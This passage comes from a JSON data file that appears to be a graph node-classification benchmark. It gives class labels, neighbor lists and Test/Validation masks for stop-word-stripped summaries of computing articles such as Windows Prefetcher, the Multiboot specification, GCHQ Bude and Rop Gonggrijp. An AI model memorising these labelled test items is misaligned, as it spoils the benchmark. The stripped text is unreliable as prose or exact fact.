quite like compared recent titles adventure games shenmue 1999 shadow memories 2001 well role-playing video game 2003 stating similarly features character interaction major gameplay element similar type multiple phrase response game generated controversy reference fictional unsolved rape donn nauert stated n't think subject american public comfortable video game even though dealt graphically ... review game dragon also criticized including warning box mature subject matter game reference unsolved rape case",
    "neighbors": [
      8355,
      6797,
      9166,
      9006,
      4924
    ],
    "mask": "Test"
  },
  {
    "node_id": 4925,
    "label": 6,
    "text": "/dev/full:/dev/full linux freebsd always full device special file always returns error code meaning space left device writing provides infinite number zero bytes process reads similar device usually used testing behaviour program encounters disk full error support always-full device linux documented early 2007 native support added freebsd 11.0 release 2016 previously supported optional module called lindev",
    "neighbors": [
      8065,
      701,
      4423,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 4926,
    "label": 2,
    "text": "Prefetcher:prefetcher prefetcher component microsoft windows introduced windows xp component memory manager speed windows boot process shorten amount time takes start programs accomplishes caching files needed application ram application launched thus consolidating disk reads reducing disk seeks feature covered us patent 6,633,968 since windows vista prefetcher extended superfetch readyboost superfetch attempts accelerate application launch times monitoring adapting application usage patterns periods time caching majority files data needed memory advance accessed quickly needed readyboost enabled uses external memory like usb flash drive extend system cache beyond amount ram installed computer readyboost also component called readyboot replaces prefetcher boot process system 700 mb ram windows system boots components many files need read memory processed often different parts file e.g registry hives loaded different times result significant amount time spent 'jumping file file back multiple times even though single access would efficient prefetcher works watching data accessed boot process including data read ntfs master file table recording trace file activity boot prefetcher continue watch activity 30 seconds user shell started 60 seconds services finished initializing 120 seconds system booted whichever elapses first future boots use information recorded trace file load code data efficient fashion i.e re-ordering disk reads minimise eliminate need access file multiple times thus minimising disk head movements application prefetching works similar fashion instead localized single application startup first 10 seconds activity monitored prefetcher stores trace files prefetch folder inside windows folder typically codice_1 name boot trace file always codice_2 application trace files concatenation application executable name hyphen hexadecimal representation hash path file resides .pf extension applications host components i.e microsoft management console dllhost name loaded component included computed hash well results different trace files created component note task scheduler process responsible parsing trace data collected prefetcher writing files prefetcher directory result prefetcher operate correctly task scheduler service started improve access times task scheduler calls windows disk defragmenter every three days machine idle lists files directories referenced boot process application startups processed processed result stored codice_3 prefetch directory subsequently passed disk defragmenter instructing re-order files sequential positions physical hard drive improve performance minimising distance hard drive heads moved one file next possible trigger re-ordering running defrag.exe systemdrive -b command line without running full defragmentation system installed solid-state drive superfetch disabled regular prefetching left enabled prefetcher configuration stored windows registry codice_4 enableprefetcher value set one following recommended value 3 values higher 3 increase performance changing value 2 make windows boot faster often found internet /prefetch:1 application tweak valid misunderstood switch used distinguish different operating modes executable case different modes would significantly different prefetch traces second myth user delete prefetch folder contents speed computer done windows need re-create prefetch files thereby slowing windows boot program starts prefetch files created—unless prefetcher disabled windows maintains prefetch files prefetch folder 128 recently launched programs",
    "neighbors": [
      8328,
      1577,
      651,
      10091,
      6797,
      8080,
      2193,
      1106,
      11667,
      823,
      9593,
      2778,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 4927,
    "label": 8,
    "text": "Ping.fm:ping.fm ping.fm advertising-supported social networking micro-blogging web service enabled users post multiple social networks simultaneously making update ping.fm pushed update number different social websites allowed individuals using multiple social networks update status without update social media individually ping.fm grouped services three categories – status updates blogs micro-blogs – updates could sent group separately ping.fm shut 5 july 2012 replaced seesmic ping seesmic later acquired hootsuite ping.fm created intent making easy possible post updates multiple social networking sites simultaneously free service discontinued six months closed beta announcement made 2 september 2008 would longer require private invite beta codes used register use service launch open beta covered outlets like wired mashable ping.fm compared favorably websites similar functionality like hellotxt shut august 2012 ping.fm powered lamp linux apache mysql php .net used core software api allows programmers apply application key order develop third party applications users must apply api key user profile user configure ping.fm account aggregate content following services note google buzz discontinued google december 15 2011 4 january 2010 seesmic announced would acquiring ping.fm may 2012 seesmic announced blog ping.fm would closed june 2012 september 2012 seesmic acquired hootsuite",
    "neighbors": [
      865,
      2945,
      8644,
      10020,
      7022,
      3573,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 4928,
    "label": 3,
    "text": "Prefetch_input_queue:prefetch input queue fetching instruction opcodes program memory well advance known prefetching served using prefetch input queue piq .the pre-fetched instructions stored data structure namely queue fetching opcodes well advance prior need execution increases overall efficiency processor boosting speed processor longer wait memory access operations subsequent instruction opcode complete architecture prominently used intel 8086 microprocessor pipelining brought forefront computing architecture design 1960s due need faster efficient computing pipelining broader concept modern processors load instructions clock cycles execute achieved pre-loading machine code memory prefetch input queue behavior applies von neumann computers harvard architecture computers run self-modifying code sort instruction pipelining nearly modern high-performance computers fulfill three requirements usually prefetching behavior piq invisible programming model cpu however circumstances behavior piq visible needs taken account programmer x86-processor changes mode realmode protected mode vice versa piq flushed else cpu continue translate machine code written last mode piq flushed processor might translate codes wrong generate invalid instruction exception executing self-modifying code change processor code immediately front current location execution might change processor interprets code already loaded piq simply executes old copy already loaded piq instead new altered version code ram and/or cache behavior piq used determine code executed inside emulator directly hardware real cpu emulators probably never simulate behavior piq-size zero changes code always affect state processor immediately deduced either code executed emulator processor invalidates piq upon writes addresses loaded piq a.k erlang 1878-1929 first conceived queue solution congestion telephone traffic different queueing models proposed order approximately simulate real time queuing systems analysed mathematically different performance specifications queuing models represented using kendall notation generally applications like prefetch input queue m/m/1 model popularly used limited use queue features model accordance microprocessors user takes role execution unit server bus interface unit processor executes program fetching instructions memory executing usually processor execution speed much faster memory access speed instruction queue used prefetch next instructions separate buffer processor executing current instruction four stage pipeline rate instructions executed four times sequential execution processor usually two separate units fetching instructions executing instructions implementation pipeline architecture possible bus interface unit execution unit independent execution unit decoding executing instruction require use data address buses bus interface unit fetches instruction opcodes memory process much faster sending address reading opcode decoding executing fetching next instruction current instruction decoded executed called pipelining 8086 architecture six-byte prefetch instruction pipeline execution unit executing current instruction bus interface unit reads six bytes opcodes advance memory six byte long queue chosen maximum number bytes required instruction 8086 long exception encountered execution unit encounters branch instruction i.e either jump call instruction case entire queue must dumped contents pointed instruction pointer must fetched memory processors implementing instruction queue prefetch algorithm rather technically advanced cpu design level complexity processors much higher regular processors primarily need implement two separate units biu eu operating separately complexity chips increases cost also increases processors relatively costlier counterparts without prefetch input queue however disadvantages greatly offset improvement processor execution time introduction prefetch instruction queue 8086 processor successive processors incorporated feature code_starts_here self-modifying program overwrite jmp to_the_end two nops encoded 0x9090 jump jmp near to_the_end assembled two bytes machine code two nops overwrite jump nothing else jump replaced do-nothing-code machine code jump already read piq probably also already executed processor superscalar processors execute several instructions pretend n't need backward compatibility change code change execution flow example nasm-syntax self-modifying x86-assembly language algorithm determines size piq code basically changes execution flow determines brute force large piq far away change code front affect near already piq update effect far enough change code affect program program found size processor piq code executed multitasking os context switch may lead wrong value",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      10786,
      6181,
      8231,
      10796,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3175,
      8815,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2250,
      9932,
      5329,
      10966,
      731,
      1247,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      7421,
      1798,
      1801,
      9996,
      6926,
      6415,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      8514,
      4423,
      8523,
      7505,
      9044,
      344,
      1376,
      10603,
      4465,
      372,
      10612,
      1399,
      7033,
      1402,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      453,
      466,
      5080,
      1499,
      477,
      1501,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 4929,
    "label": 2,
    "text": "Multiboot_specification:multiboot specification multiboot specification open standard describing boot loader load x86 operating system kernel specification allows compliant boot loader implementation boot compliant operating system kernel thus allows different operating systems boot loaders work together interoperate without need operating system–specific boot loaders result also allows easier coexistence different operating systems single computer also known multi-booting specification originally created 1995 developed free software foundation gnu hurd vmware esxi xen l4 microkernels need booted using method gnu grub reference implementation used gnu operating system operating systems latest version multiboot specification 0.6.96 defined 2009 incompatible second iteration uefi support multiboot2 specification later introduced lastest version multiboot2 2.0 defined 2016 multiboot defines header struct needs present image file whole multiboot2 fields group fields type tag allows omitted multiboot2 header within os image file header must first 8192 2^13 bytes multiboot 32768 2**15 bytes multiboot2 loader searches magic number find header magic 0x1badb002 multiboot 0xe85250d6 multiboot2 header codice_1 points code control handed os allows different executable file formats os kernel elf file linux kernel omitted multiboot2 elf format common open source world field codice_2 containing entry point jumping os entry point boot loader must provide boot information structure tell os left system form multiboot struct multiboot2 every field group type tag size",
    "neighbors": [
      10813,
      6012,
      6153,
      2762,
      5596,
      7983,
      499,
      2811,
      3068,
      4637,
      671
    ],
    "mask": "None"
  },
  {
    "node_id": 4930,
    "label": 9,
    "text": "Frances_E._Allen:frances e. allen frances elizabeth fran allen born august 4 1932 american computer scientist pioneer field optimizing compilers allen first female ibm fellow 2006 became first woman win turing award achievements include seminal work compilers program optimization parallelization since 2002 fellow emerita ibm allen grew farm peru new york graduated new york state college teachers part state university new york albany suny b.sc mathematics 1954 began teaching school peru new york two years enrolled university michigan earned m.sc degree mathematics 1957 deeply debt joined ibm research poughkeepsie ny programmer 1957 taught incoming employees basics fortran planned return teaching student loans paid ended staying ibm entire 45-year career allen assigned harvest project code breaking national security agency 1959 worked programming language called alpha managed compiler-optimization team harvest stretch project 1960s contributed acs-1 project 1970s pl/i 1970 1971 spent sabbatical new york university acted adjunct professor years afterwards another sabbatical brought stanford university 1977 allen became first female ibm fellow 1989 retired ibm 2002 remains affiliated corporation fellow emerita 2007 ibm ph.d. fellowship award created honor a.m. turing award citation reads publications include allen fellow institute electrical electronics engineers ieee association computing machinery acm 2000 made fellow computer history museum contributions program optimization compiling parallel computers elected national academy engineering 1987 american philosophical society 2001 national academy sciences 2010 nominated fellow american academy arts sciences 1994 received ieee computer society charles babbage award 1997 computer pioneer award ieee computer society 2004 1997 allen inducted witi hall fame 2002 augusta ada lovelace award association women computing 2004 allen winner abie award technical leadership anita borg institute allen recognized work high-performance computing 2006 turing award became first woman recipient forty-year history award considered equivalent nobel prize computing given association computing machinery interviews following award hoped would give opportunities women science computing engineering 2009 awarded honorary doctor science degree mcgill university pioneering contributions theory practice optimizing compiler techniques laid foundation modern optimizing compilers automatic parallel execution allen married nyu professor jacob t. schwartz 1972 divorced ten years later children",
    "neighbors": [
      7048,
      11020,
      3854,
      1952,
      10668,
      2482,
      8502,
      6967,
      1976,
      2620,
      4799,
      4800,
      10049,
      70,
      8262,
      3529,
      7887,
      1883,
      7775,
      9315,
      10469,
      11242,
      2283,
      2798,
      3960,
      3323,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 4931,
    "label": 9,
    "text": "HyperFun:hyperfun hyperfun hyperdimensional functions programming language software used create visualize fabricate volumetric 3d higher-dimensional models team maintaining hyperfun project freely associated group researchers students different countries world uk russia france japan norway usa others called digital materialization group digitalmaterial.org hyperfun allows users easily model objects quality found reality nature system based new mathematical framework geometry function representation frep provides uniform method model surface geometry internal composition simultaneously also compact precise framework represent objects unlimited complexity properties compared traditional modeling systems hyperfun able digitally describe create modify models real imagined object environment technically complex geometric objects hyperfun constructed simple primitives various operations performed object three-dimensional space defined function point coordinates f x z continuous real function positive inside object negative outside takes zero value surface similarly multidimensional object defined function several variables f x1 x2 x3 ... xn example object changing time defined f x z representing time attributes color material density also defined corresponding functions constitutes new paradigm procedural function-based volume modeling rendering object shape properties locally evaluated request using black box procedures",
    "neighbors": [
      5612,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 4932,
    "label": 3,
    "text": "Jesus_(video_game):jesus video game game name refers space station called j.e.s.u.s. named central christian figure jesus ship shaped like double-edged sword la book revelation inhabitants go fight mysterious demonic alien halley comet game takes place 2061 halley comet approaching mars quite time nations earth send mission investigate comet form life detected inside gas musou hayao stationed space lab jesus speaks commanding officer station requests track members two crews sent comet give access cards using spaceships hayao meets 7 different crew members time chinese doctor german captain soviet captain american xenobiologist french mathematician italian computer engineer brazilian astronomer mathematician also hayao love interest eline share heartfelt goodbye boarding different ships mission depart two weeks apart another eline ship leaving comet first eline happens talented musician well mathematician plays song wrote leaves meeting crew cuts hayao ship arrived halley comet hayao sent investigate first ship finds crew missing eline intelligent robot pet fojii found ship docking bay updating data offers hayao assistance tracking missing crew members unfortunately many found dead beginning die whispering dire vague warnings hayao something else board crew member tells hayao fire hurt none dead crew display physical signs harm except small pinprick one fingers hayao collects key cards missing murdered crew access journal entries video recordings showing xenomorph-like creature attacking ship recordings also say eline fled alien creature hid giving hayao hope may still alive ship investigating eline hayao fojii eventually come face-to-face monster first fleeing way harming eventually attacking freeze gun looted armory 4th floor ship manage kill slowing movements ensure chase eline soon found hiding one engine rooms hayao reunites asking happened arrived tells eline crew died make plans use shuttlepods escape spaceship shuttles take one passenger eline uses first shuttle hayao following shortly leaves encounters alien monster leaves behind piece skin body hayao contacts xenobiologist requests bring back sample study back first ship xenobiologist carson begins research alien monster soon enough sample monster breaks free hides ship hayao carson suspect alien able regrow sample much like worm cut half searching ship clues hayao discovers happenings eerily reminiscent second ship previous crew doctor cryogenic pod used access astronomer favourite food hamburgers found littered one storage bays briefing room tape recording eline song found starts playing randomly comms player explores ship abruptly stop upon returning room tape containing eline song crushed suddenly carson attacked monster missing presumably dead hayao commanding officer jesus arrives aid capturing killing monster costs hayao eline board commander vessel plan next attempt locate ultimately destroy monster carson manages send signal first ship hayao goes back investigate however upon returning commander vessel monster also boarded ship breaks nearby vent hayao eline manage escape due commander sacrifice closes door behind pushing two safety primary ship hide cryo-pods fearful alien next moves hayao finds way communicate jesus carson pod carson hooked pod comm system main labs midst sending distress call jesus alien monster evolved begins speak strange language eline notes language sounds like many human languages mangled together fojii begins decrypting speech able communicate alien speech combination chinese german russian english italian portuguese making clear alien taken knowledge memories crew members killed using dna stole bodies evolve monster informs hayao taken control ship plans head jesus order conquer mankind killing sake advanced evolution alien mentions longer harmed hayao freeze rays shown earlier confrontations developing resistance hayao eline try bargaining alien avail hayao bluffs claims remote detonator use destroy ship alien meet lure alien ship considering options searching sort weapon harm fojii helps hayao recall happened tape eline song started playing monster one crushed tape finding harmony unbearable foreign biology takes eline synthesizer confronts alien front airlock plays eline song monster disabled long enough hayao jettison creature space hearing telepathically voices crew members killed tell hayao eline memories live inside alien creature one although long gone assure two humanity strength fight new breed monster even returns attempt destroy mankind day suspect hayao eline hold one another ship staring void space knowing tell tales fallen colleagues prepare earth future confrontation halley comet returns game proceeds linear adventure game player chooses action perform action actions vary based room situation although game implies danger various points seem possible lose three main sections game although first section mostly introduction characters game largely presented anime style although art fairly bright positive style first section game changes sections atmosphere game music game music composed koichi sugiyama dragon quest fame overworld theme dragon quest another game enix present pc-8801 version game sequel titled jesus ii ジーザス2 jīzasu tsū released 1991 nec pc-8801 nec pc-9801 sharp x68000 home computers",
    "neighbors": [
      7023
    ],
    "mask": "Test"
  },
  {
    "node_id": 4933,
    "label": 2,
    "text": "Dictionary_(software):dictionary software dictionary application developed apple inc. part macos application provides definitions synonyms various dictionaries wikipedia articles glossary apple-related terms dictionary introduced os x 10.4 new oxford american dictionary oxford american writer thesaurus well wikipedia apple sections 10.5 added japanese dictionaries 10.7 added british oxford dictionary english 10.8 added french german spanish chinese os x progenitor openstep nextstep provided similar functionality called digital webster providing dictionary thesaurus definitions webster ninth new collegiate dictionary webster collegiate thesaurus termed first digital edition openstep services provide lookup applications dictionary first introduced mac os x v10.4 tiger provided definitions new oxford american dictionary 2nd edition mac os x 10.7 lion dictionary updated third edition new oxford american dictionary british oxford dictionary english added words entered search bar typing first letters application perform incremental search show matching headwords forms try bypass spelling errors clicking word definition searches word dictionary almost word clickable except pronunciations phonetic characters numerals preferences allow user select three different pronunciation schemes either us english diacritical ipa british english ipa dictionary thesaurus dictionary xml format make use precompiled binary index files access xml file directly therefore lexicon easily modified however user add new words macos system-wide spell checker uses lexicon mac os x 10.5 leopard added japanese-language dictionary daijisen progressive english japanese progressive japanese english dictionaries 25,000-entry thesaurus provided japanese publisher shogakukan japanese dictionaries show default must enabled preferences os x 10.8 mountain lion japanese dictionaries replaced super daijirin wisdom english-japanese dictionary addition dictionaries also added french multidictionnaire de la langue française macs sold europe les éditions québec amérique macs sold america german duden spanish vox chinese standard dictionary contemporary chinese software dictunifier used add dictionaries application although dictionary entries purport neutral entries apple dictionary application criticised exhibiting various forms bias complaint filed 2013 entry gay included informal definition foolish stupid unimpressive making students wait light kind gay rule definition since amended label offensive addition writers dictionary exhibit gender bias definitions political apolitical definition political associates word man political man example apolitical associates word woman interested involved politics former apolitical housewife form gender bias documented many dictionaries",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      11509,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      9035,
      1878,
      4457,
      9100,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      479,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "None"
  },
  {
    "node_id": 4934,
    "label": 3,
    "text": "Kernel_relocation:kernel relocation kernel relocation may refer linux feature kernel compiled bootable variety different memory addresses instead fixed address used connection kexec crash recovery",
    "neighbors": [
      10063,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 4935,
    "label": 4,
    "text": "Manu_propria:manu propria also found several ancient documents front writer signature end document richly decorated manu propria signs frequently used medieval dignitaries literates verify authenticity handwritten documents mppria commonly used 18th century however used latin documents later official documents routinely accompanied abbreviation example declaration war serbia emperor franz joseph 1914 ends m.p. ordinary personal cheques frequently include abbreviation end signature line countries still regularly use manu propria include",
    "neighbors": [
      9576,
      5433,
      1821
    ],
    "mask": "Test"
  },
  {
    "node_id": 4936,
    "label": 4,
    "text": "NIST_Cybersecurity_Framework:nist cybersecurity framework nist cybersecurity framework provides policy framework computer security guidance private sector organizations united states assess improve ability prevent detect respond cyber attacks framework translated many languages used governments japan israel among others provides high level taxonomy cybersecurity outcomes methodology assess manage outcomes version 1.0 published us national institute standards technology 2014 originally aimed operators critical infrastructure used wide range businesses organizations helps shift organizations proactive risk management 2017 draft version framework version 1.1 circulated public comment version 1.1 announced made publicly available april 16 2018 version 1.1 still compatible version 1.0 changes include guidance perform self-assessments additional detail supply chain risk management guidance interact supply chain stakeholders security framework adoption study reported 70 surveyed organizations see nist framework popular best practice computer security many note requires significant investment includes guidance relevant protections privacy civil liberties 2017 nist published nist baldrige cyber security excellence builder leverages 2014 framework includes simpler self-assessment questions divided six areas results section nist cybersecurity framework designed individual businesses organizations use assess risks face framework divided three parts core profile tiers framework core contains array activities outcomes references aspects approaches cybersecurity framework implementation tiers used organization clarify partners views cybersecurity risk degree sophistication management approach framework profile list outcomes organization chosen categories subcategories based needs risk assessments organization typically starts using framework develop current profile describes cybersecurity activities outcomes achieving develop target profile adopt baseline profile tailored sector e.g infrastructure industry type organization define steps switch current profile target profile nist cybersecurity framework organizes core material five functions subdivided total 23 categories category defines number subcategories cybersecurity outcomes security controls 108 subcategories subcategory also provides informative resources referencing specific sections variety information security standards including cobit nist sp 800-53 ansi/isa-62443 council cybersecurity critical security controls ccs csc managed center internet security special publications sp aside informative references requires paid membership purchase access respective guides cost complexity framework resulted bills houses congress direct nist create cybersecurity framework guides accessible small medium businesses functions categories along unique identifiers definitions stated category column spreadsheet view core standard develop organizational understanding manage cybersecurity risk systems assets data capabilities develop implement appropriate safeguards ensure delivery critical infrastructure services develop implement appropriate activities identify occurrence cybersecurity event develop implement appropriate activities take action regarding detected cybersecurity event develop implement appropriate activities maintain plans resilience restore capabilities services impaired due cybersecurity event",
    "neighbors": [
      3552,
      9049,
      1897,
      399,
      8881,
      3447,
      6360,
      3897,
      3994,
      10717,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4937,
    "label": 4,
    "text": "GCHQ_Bude:gchq bude gchq bude also known gchq composite signals organisation station morwenstow abbreviated gchq cso morwenstow uk government satellite ground station eavesdropping centre located north cornwall coast cleave camp small villages morwenstow coombe operated british signals intelligence service officially known government communications headquarters commonly abbreviated gchq located part site former world war ii airfield raf cleave site gchq bude morwenstow northernmost parish cornwall world war ii location developed used royal air force raf raf cleave conceived housing target target support aircraft firing ranges along north cornwall coast land acquired cleave manor 1939 became home two flights 1aac 1943 639 squadron established site remainder war airfield put maintenance april 1945 staying government ownership early 1960s developments occurred appear prompted establishment facility known gchq bude 1962 satellite receiving station commercial communication satellites intelsat established goonhilly downs hundred kilometres south-southwest morwenstow downstream link intelsat satellites could easily intercepted placing receiver dishes nearby satellites 'footprint land cleave allotted ministry public buildings works 1967 construction satellite interception station began 1969 two dishes appeared first followed smaller dishes ensuing years station originally signposted 'csos morwenstow 'csos standing composite signals organisation station 2001 third large dish appeared station eventually became known 'gchq bude inception station anglo-american co-operative project united states national security agency nsa paid infrastructure technology running costs like payments staff paid gchq also provided land intelligence collected bude satellite station shared among nsa gchq also jointly processed another sign close cooperation countries sir leonard hooper gchq director late 1960s wrote nsa counterpart regarding two large dishes suggested naming 'pat 'louis nsa director marshall 'pat carter deputy louis tordella 2010 national security agency paid gchq £15.5m redevelopments site 1963 tat-3 undersea cable linking united kingdom united states laid tuckerton new jersey us widemouth bay cornwall south site cleave camp british general post office gpo routinely monitored communications passing along tat-3 cable forwarding messages felt relevant security services site cleave camp presented opportunity monitor submarine cable traffic nearby landing points time intercepting communications meant commercial satellite ground station goonhilly downs tat-14 undersea cable landing bude identified one assets critical infrastructure key resources us foreign territory diplomatic cable leaked wikileaks gchq bude station comprises twenty one satellite antennae various sizes including three diameter could theoretically cover main frequency bands l band c band k band x band k band v band calculated basis position elevation compass azimuth angle antennae generally orientated towards satellites intelsat intersputnik inmarsat communications networks atlantic ocean africa indian ocean well towards middle east mainland europe somewhere 2011 2013 torus antenna installed able receive signals thirty-five satellites simultaneously antenna covered radome staff drawn gchq uk nsa u.s. station operated ukusa agreement gathering data echelon signals intelligence sigint network comparable stations operation include raf menwith hill uk sugar grove station west virginia u.s. yakima washington u.s. sabana seca puerto rico misawa air base japan pine gap australia geraldton australia gcsb waihopai new zealand gcsb tangimoana new zealand cover intelsat areas south america pacific ocean activities gchq bude usually remain classified however partly response concerns expressed european union eu member states morwenstow responsible industrial espionage interception civilian communications report european parliament referenced made public 2001 provides details station intelligence services act 1994 grants gchq power 'to monitor interfere electromagnetic acoustic emissions equipment producing emissions obtain provide information derived related emissions equipment includes blackberry messenger bbm audio messages 1 june 2007 gchq bude designated protected site purposes section 128 serious organised crime police act 2005 effect act make specific criminal offence person trespass site early 2014 gchq careers website page gchq bude said employs digital communications experts play important role formulating united kingdom government response issues involving national security military operations serious crime web page mentioned site adjacent coastal footpath part south west coast path elsewhere website job applicants warned subject developed vetting security clearance could take nine months proceed 2016 gchq careers website 'life gchq page 'bude section page describes working gchq bude little mentions gym restaurant boasting sea view within facility also describes range social outdoor sporting events employees take part june 2013 guardian newspaper using documents leaked former national security agency nsa contractor edward snowden revealed existence operation codenamed tempora whereby gchq able tap data flows along undersea cables store 30 days assess analyse article refers three-year trial set gchq bude mid 2011 probing 200 internet connections guardian report december 2013 stated eavesdropping efforts target charities german government buildings israeli prime minister eu commissioner centred activities run gchq bude gchq bude featured extensively 3 september 2014 bbc two horizon television programme programme estimated 25 internet traffic travels cornwall england dr joss wright university oxford internet institute explained mirror images signals running submarine ethernet cables used gather analyse data programme claimed procedure involves optical tap device inserted submarine cable repeater station second copy data travels gchq original carries intended journey gchq claimed three days replay data stated everything comes across internet theoretically accessed including emails websites bittorrent downloads films watched etc wright added internal documents show 2011 200 10-gigabit cables coming cornwall tapped gchq dr wright said entire digitised contents british library could transferred set cables 40 seconds programme tim berners-lee explained huge volumes data analysed gchq computer programmes identify trends communication deemed require examination 20 november 2014 channel 4 news broadcast investigation prepared collaboration german broadcaster westdeutscher rundfunk wdr report revealed leading uk communications company cable wireless vodafone cooperated gchq allow access data including carried rival indian telecommunications company broadcast detailed operation centred fibre-optic cables surfacing porthcurno beach sennen cove cornwall data travelling nearby cable landing station skewjack farm onwards gchq bude 4 april 2016 royal highness princess royal made first royal visit gchq bude station princess royal arrived helicopter greeted head gchq bude station along lord lieutenant cornwall colonel edward bolitho visit consisted short tour site hrh met many members staff grades learnt activities carried bude july 2016 gchq launched cyberfirst scheme students 2016/17 academic year offering bursaries studying relevant science technology engineering mathematics stem graduate courses followed guaranteed jobs gchq including bude gchq 17 may 2016 satellite dishes gchq bude station lit display rainbow colours mark international day homophobia transphobia biphobia idahobit display public act unity recognition pride gchq assert continued commitment gchq diversity pride staff follows similar rainbow coloured themed display support 2015 idahobit gchq cheltenham site year earlier south gchq bude widemouth bay numerous submarine cables make landfall followed locations link brackets include apollo us tat-3 us cantat-1 canada tat-8 us france last used 2002 tat-14 us europe ac-2 us eig europe india glo-1 west africa crooklets beach bude south gchq bude key submarine cable landing point particular carrying financial trading data new york",
    "neighbors": [
      3428,
      3495,
      6344,
      2892,
      7887,
      1169,
      11089,
      4595,
      8276,
      7893,
      8564,
      10935,
      8156,
      6749
    ],
    "mask": "None"
  },
  {
    "node_id": 4938,
    "label": 5,
    "text": "IBM_1009:ibm 1009 ibm 1009 data transmission unit ibm communications controller introduced 1960 1009 used synchronous transmit-receive str protocol transfer data 150 characters per second cps single point-to-point dial leased telephone line system advertised able link magnetic core memories ibm 1401 computers telephone lines 1009 attached ibm 1400 series computers 1401 1961 transmission rate doubled 300 cps 1962 1009 part test data communications using telstar satellite link two 1401 computer systems",
    "neighbors": [
      11217,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 4939,
    "label": 2,
    "text": "Inter-App_Audio:inter-app audio inter-app audio iaa technology developed apple inc designed route audio midi signals various applications within devices based ios mobile operating system technology first introduced 2013 seventh version ios inter-app audio host-plugin technology means application called host initiate connection node plug-in application order send receive audio send midi timeline etc signals also host application receive remote control signals node application node applications following types moment audio signal routing possible frequency 44 100 hz",
    "neighbors": [
      2259
    ],
    "mask": "None"
  },
  {
    "node_id": 4940,
    "label": 4,
    "text": "Rop_Gonggrijp:rop gonggrijp robbert rop valentijn gonggrijp born 14 february 1968 dutch hacker one founders xs4all gonggrijp born amsterdam growing wormer dutch zaanstreek area became known teenage hacker appeared one main characters jan jacobs book kraken en computers hacking computers veen uitgevers 1985 describes early hacker scene netherlands moved amsterdam 1988 founded hacker magazine hack-tic 1989 believed major security threat authorities netherlands united states masthead hack-tic gonggrijp described role hoofdverdachte 'prime suspect convinced internet would radically alter society 1993 number people surrounding hack-tic including gonggrijp founded xs4all first isp offered access internet private individuals netherlands gonggrijp sold company former enemy dutch-telecom kpn 1997 left xs4all gonggrijp founded itsx computer security evaluation company bought madison gurkha 2006 2001 gonggrijp started work cryptophone mobile telephone encrypt conversations since 1989 gonggrijp main organizer hacker events held every four years originally organized cast hack-tic events continued live day throughout years repeatedly shown concerns increasing amount information individuals government agencies companies access rop held controversial talk titled lost war chaos communication congress 2005 berlin together frank rieger 2006 founded organisation wij vertrouwen stemcomputers niet trust voting computers campaigns use electronic voting systems without voter verified paper audit trail showed october 2006 dutch television electronic voting machine manufacturer nedap could easily hacked findings taken seriously dutch government international election observers 16 may 2008 dutch government decided elections would held using paper ballots red pencil proposal develop new generation voting computers rejected gonggrijp worked wikileaks helping prepare collateral murder april 2010 release video footage baghdad airstrike 14 december 2010 relation ongoing investigations wikileaks us department justice issued subpoena ordering twitter release information regarding gonggrijp account well julian assange chelsea manning birgitta jónsdóttir jacob appelbaum 637,000 users following wikileaks reason gonggrijp collaboration releasing collateral murder video april 2010 wikileaks action",
    "neighbors": [
      8320,
      4133,
      3495,
      297,
      3629,
      1946,
      4956
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4941,
    "label": 4,
    "text": "Ivan_Krstić:ivan krstić ivan krstić croatian computer security expert currently working core security apple inc. krstić previously director security architecture one laptop per child co-author official ubuntu book born croatia krstić received scholarship attend cranbrook kingswood school michigan u.s 15 2004 enrolled harvard college took year leave work secure electronic healthcare croatia largest children hospital returning harvard 2005 took another leave offered position one laptop per child designed bitfrost security architecture personally oversaw project first two in-country deployments uruguay peru left project early 2008 later joined apple may 2009 2007 krstić became tr35 laureate selected mit technology review one world top 35 innovators age 35 year later eweek magazine declared one top three influential people modern computer security one top 100",
    "neighbors": [
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4942,
    "label": 0,
